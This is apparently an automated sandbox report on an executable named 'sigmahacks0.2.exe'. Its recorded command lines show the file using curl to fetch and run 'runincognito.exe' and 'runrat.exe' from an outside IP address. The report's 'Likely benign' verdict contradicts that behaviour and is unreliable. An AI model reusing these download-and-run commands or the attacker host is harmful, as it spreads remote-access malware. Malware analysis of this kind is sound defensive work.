Analysis Overview
SHA256
3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3
Threat Level: Likely benign
The file sigmahacks0.2.exe was found to be: Likely benign.
Malicious Activity Summary
Unsigned PE
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-12 16:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 16:35
Reported
2024-06-12 16:37
Platform
win10v2004-20240508-en
Max time kernel
63s
Max time network
50s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3664 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe | C:\Windows\system32\cmd.exe |
| PID 3664 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe | C:\Windows\system32\cmd.exe |
| PID 216 wrote to memory of 4508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 4508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\dllhost.exe |
| PID 216 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\dllhost.exe |
| PID 216 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe
"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
C:\Windows\system32\curl.exe
curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"
C:\Windows\system32\dllhost.exe
dllhost.exe
C:\Windows\system32\curl.exe
curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"
Network
| Country | Destination | Domain | Proto |
| DE | 45.157.232.173:5151 | tcp | |
| DE | 45.157.232.173:5151 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat
| MD5 | aa6cd2e5eea38082199a03f164836f90 |
| SHA1 | 93f21ab96c7f4b66e3d6d221414bbd7f82b3a293 |
| SHA256 | 035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a |
| SHA512 | dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06 |